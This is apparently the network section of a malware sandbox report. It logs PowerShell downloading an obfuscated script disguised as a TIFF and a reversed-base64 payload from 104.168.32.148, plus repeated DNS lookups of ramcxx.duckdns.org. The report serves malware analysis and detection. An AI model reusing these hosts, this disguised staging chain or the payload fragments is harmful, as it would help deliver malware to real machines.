                                                Sep 25, 2024 18:50:19.577579021 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577581882 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577594995 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577600002 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577605009 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577610016 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577666998 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.622849941 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.622884989 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.622899055 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.622910976 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.622922897 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.622936010 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.622971058 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.622980118 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.623008013 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663712025 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663737059 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663749933 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663762093 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663767099 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663774967 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663786888 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663796902 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663801908 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663826942 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663858891 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663861036 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663873911 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663885117 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663896084 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663907051 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663913012 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663918972 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663934946 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663953066 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663976908 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663979053 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663992882 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664031029 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664032936 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664041996 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664055109 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664066076 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664068937 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664079905 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664093018 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664096117 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664129019 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664195061 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664205074 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664222956 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664235115 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664243937 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664258003 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664263010 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664282084 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664294004 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664294004 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664304972 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664316893 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664329052 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664340019 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664350986 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664354086 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664381981 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664396048 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664402962 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664414883 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664447069 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664448977 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664458990 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664470911 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664508104 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664531946 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664545059 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664577007 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664583921 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664589882 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664632082 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664654970 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664666891 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664676905 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664688110 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664700031 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664710999 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664721966 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664741039 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664894104 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664906025 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664916992 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664927006 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664942980 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664956093 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664956093 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664956093 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664975882 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664985895 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664998055 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664998055 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665010929 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665023088 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665024996 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665035963 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665049076 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665069103 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665210962 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665221930 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665236950 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665249109 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665260077 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665271044 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665271997 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665286064 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665298939 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665298939 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665312052 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665318012 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665335894 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665407896 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665421963 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665445089 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665456057 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665466070 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665478945 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665491104 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665493011 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665502071 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665514946 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665527105 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665527105 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665555954 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665570021 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665585041 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665791035 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665801048 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665810108 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665833950 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665841103 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665846109 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665857077 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665862083 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665869951 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665879965 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665882111 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665890932 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665901899 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665909052 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665913105 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665925980 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665932894 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665942907 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665951967 CEST8049708104.168.32.148192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 18:50:12.195559978 CEST | 64644 | 53 | 192.168.2.5 | 1.1.1.1
Sep 25, 2024 18:50:12.344655991 CEST | 53 | 64644 | 1.1.1.1 | 192.168.2.5
Sep 25, 2024 18:50:20.021799088 CEST | 53409 | 53 | 192.168.2.5 | 1.1.1.1
Sep 25, 2024 18:50:20.133908987 CEST | 53 | 53409 | 1.1.1.1 | 192.168.2.5
Sep 25, 2024 18:50:32.386616945 CEST | 64508 | 53 | 192.168.2.5 | 1.1.1.1
Sep 25, 2024 18:50:32.513113022 CEST | 53 | 64508 | 1.1.1.1 | 192.168.2.5
Sep 25, 2024 18:51:27.347918034 CEST | 58873 | 53 | 192.168.2.5 | 1.1.1.1
Sep 25, 2024 18:51:27.506309032 CEST | 53 | 58873 | 1.1.1.1 | 192.168.2.5
Sep 25, 2024 18:52:34.745368958 CEST | 62817 | 53 | 192.168.2.5 | 1.1.1.1
Sep 25, 2024 18:52:34.871671915 CEST | 53 | 62817 | 1.1.1.1 | 192.168.2.5
Sep 25, 2024 18:53:42.245615005 CEST | 51858 | 53 | 192.168.2.5 | 1.1.1.1
Sep 25, 2024 18:53:42.372384071 CEST | 53 | 51858 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 18:50:12.195559978 CEST | 192.168.2.5 | 1.1.1.1 | 0x3796 | Standard query (0) | ia600100.us.archive.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:50:20.021799088 CEST | 192.168.2.5 | 1.1.1.1 | 0x1034 | Standard query (0) | ramcxx.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:50:32.386616945 CEST | 192.168.2.5 | 1.1.1.1 | 0xf51f | Standard query (0) | ramcxx.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:51:27.347918034 CEST | 192.168.2.5 | 1.1.1.1 | 0x6a18 | Standard query (0) | ramcxx.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:52:34.745368958 CEST | 192.168.2.5 | 1.1.1.1 | 0x74f5 | Standard query (0) | ramcxx.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:53:42.245615005 CEST | 192.168.2.5 | 1.1.1.1 | 0xa625 | Standard query (0) | ramcxx.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 18:50:12.344655991 CEST | 1.1.1.1 | 192.168.2.5 | 0x3796 | No error (0) | ia600100.us.archive.org | | 207.241.227.240 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:50:20.133908987 CEST | 1.1.1.1 | 192.168.2.5 | 0x1034 | No error (0) | ramcxx.duckdns.org | | 45.134.140.70 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:50:32.513113022 CEST | 1.1.1.1 | 192.168.2.5 | 0xf51f | No error (0) | ramcxx.duckdns.org | | 45.134.140.70 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:51:27.506309032 CEST | 1.1.1.1 | 192.168.2.5 | 0x6a18 | No error (0) | ramcxx.duckdns.org | | 45.134.140.70 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:52:34.871671915 CEST | 1.1.1.1 | 192.168.2.5 | 0x74f5 | No error (0) | ramcxx.duckdns.org | | 45.134.140.70 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:53:42.372384071 CEST | 1.1.1.1 | 192.168.2.5 | 0xa625 | No error (0) | ramcxx.duckdns.org | | 45.134.140.70 | A (IP address) | IN (0x0001) | false
                                                • ia600100.us.archive.org
                                                • 104.168.32.148
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.168.32.148 | 80 | 1600 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 18:50:06.117193937 CEST | 318 | OUT | GET /345/nicemeetingsofpictureclearthingstobe.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 104.168.32.148
Connection: Keep-Alive
Sep 25, 2024 18:50:06.613581896 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 16:50:06 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 25 Sep 2024 01:41:49 GMT
ETag: "3f892-622e7b9c7d160"
Accept-Ranges: bytes
Content-Length: 260242
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
                                                Data Ascii: fGUWLaCkkRkWcWalKJzcKLtLz = "dTbApUNcKApSKLfUHzKbfcoUl"LPBncLiueGekqTcantissocialistaLPpOBPhe = "KzlAQSKqZmeLptacaeeAWuooi"WbbuWhzUcLiGzvQpPGOoJcUrU = "LPZKiqALiZtPPUUOiihptRcdG"pvKZoJoHlmmKgpGHeGHZznKLi = "adlWvLPpjZRWekqUWeZaNGtAL"BiUzJLLJWbpCZLpiReHsbNWOZ = "RpaLkGNWQkWzLWWgWLpxudGLc"eGgzNtoiWuWfBkczcmuqZjHig = "QieLLApLLKWbKffRLLOZzBhWi"PWKccUmcmZjfudnecPUWWRvfL = "lUOPrGCviKNeifitWAItKZZkL"aSizWPOQjepqhhflZbGOscpAp = "LsPKGPNcTULGkik
                                                Sep 25, 2024 18:50:06.613765001 CEST328INData Raw: 00 78 00 73 00 71 00 66 00 4c 00 4c 00 20 00 3d 00 20 00 22 00 47 00 68 00 63 00 75 00 50 00 4c 00 62 00 7a 00 6d 00 62 00 4b 00 4e 00 6f 00 4c 00 64 00 74 00 69 00 63 00 69 00 42 00 4c 00 6a 00 4c 00 62 00 47 00 22 00 0d 00 0a 00 6b 00 4a 00 57
                                                Data Ascii: xsqfLL = "GhcuPLbzmbKNoLdticiBLjLbG"kJWTGlhGoILkBHUoiPfBGicxW = "koeLiLhLBtGAWCfkubJKNxuAL"tGOZLioNpOzdKKNGGfKLOWiiL
                                                Sep 25, 2024 18:50:06.613779068 CEST1236INData Raw: 00 4c 00 6e 00 57 00 6b 00 70 00 74 00 4e 00 73 00 4e 00 42 00 6d 00 6f 00 69 00 20 00 3d 00 20 00 22 00 47 00 63 00 4c 00 64 00 42 00 4c 00 66 00 69 00 69 00 4c 00 75 00 6d 00 65 00 6b 00 63 00 62 00 6f 00 69 00 63 00 66 00 4c 00 52 00 6b 00 50
                                                Data Ascii: LnWkptNsNBmoi = "GcLdBLfiiLumekcboicfLRkPi"kjtNpoazZcxfeahWWcAKkfeHA = "ikACoWPbfLbixQZWIlaPUWzka"bqcLPcPzcAkztGZouKf
                                                Sep 25, 2024 18:50:06.613794088 CEST1236INData Raw: 00 76 00 66 00 4e 00 5a 00 4f 00 72 00 4e 00 55 00 47 00 4f 00 6e 00 4b 00 64 00 43 00 43 00 4b 00 61 00 69 00 6d 00 50 00 5a 00 42 00 22 00 0d 00 0a 00 70 00 50 00 64 00 63 00 68 00 71 00 6b 00 4b 00 55 00 4e 00 57 00 75 00 69 00 57 00 6d 00 4c
                                                Data Ascii: vfNZOrNUGOnKdCCKaimPZB"pPdchqkKUNWuiWmLWkbGQLPUz = "pKeokUoeqTApeLsttZNSNWUWU"LpGcLJlLxPWGzKLCAAKbAcLpm = "qzOUzBetot
                                                Sep 25, 2024 18:50:06.618721962 CEST1236INData Raw: 00 50 00 53 00 52 00 67 00 6f 00 57 00 47 00 63 00 42 00 61 00 57 00 62 00 5a 00 57 00 57 00 20 00 3d 00 20 00 22 00 63 00 57 00 69 00 78 00 4c 00 53 00 69 00 65 00 57 00 66 00 70 00 4b 00 68 00 50 00 64 00 43 00 6c 00 43 00 4c 00 52 00 54 00 4f
                                                Data Ascii: PSRgoWGcBaWbZWW = "cWixLSieWfpKhPdClCLRTOkIi"RgrLSKfmLLtZZKnlnLabLpJLZ = "kRvubNKdAaeaziWqWNixfelGI"uWxjgWhZUWAKhck


                                                Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49708 | Destination IP: 104.168.32.148 | Destination Port: 80 | PID: 1672 | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 25, 2024 18:50:18.633836031 CEST | 78 | OUT | GET /345/CHPPZA.txt HTTP/1.1
                                                Host: 104.168.32.148
                                                Connection: Keep-Alive
                                                Sep 25, 2024 18:50:19.113245964 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 25 Sep 2024 16:50:19 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                Last-Modified: Wed, 25 Sep 2024 01:38:21 GMT
                                                ETag: "a1000-622e7ad53cccd"
                                                Accept-Ranges: bytes
                                                Content-Length: 659456
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/plain
                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                Data Ascii: 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
                                                Sep 25, 2024 18:50:19.113270998 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                Sep 25, 2024 18:50:19.113285065 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                Sep 25, 2024 18:50:19.113296986 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                Sep 25, 2024 18:50:19.113311052 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                Sep 25, 2024 18:50:19.113322020 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                Sep 25, 2024 18:50:19.113336086 CEST776INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
